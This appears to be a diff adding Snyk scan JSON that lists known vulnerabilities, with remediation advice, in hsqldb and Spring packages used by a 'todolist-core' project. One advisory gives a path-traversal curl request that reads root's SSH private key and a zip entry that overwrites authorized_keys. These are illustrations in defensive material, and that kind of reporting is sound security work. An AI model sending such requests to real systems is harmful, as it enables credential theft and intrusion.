+ "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [ + false, + "org.hsqldb:hsqldb@2.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.18.RELEASE", + "org.springframework:spring-core@5.2.18.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.19.RELEASE", + "org.springframework:spring-core@5.2.19.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@3.2.9.RELEASE", + "org.springframework:spring-core@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.20.RELEASE", + "org.springframework:spring-expression@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.23.RELEASE", + "org.springframework:spring-expression@5.2.23.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": 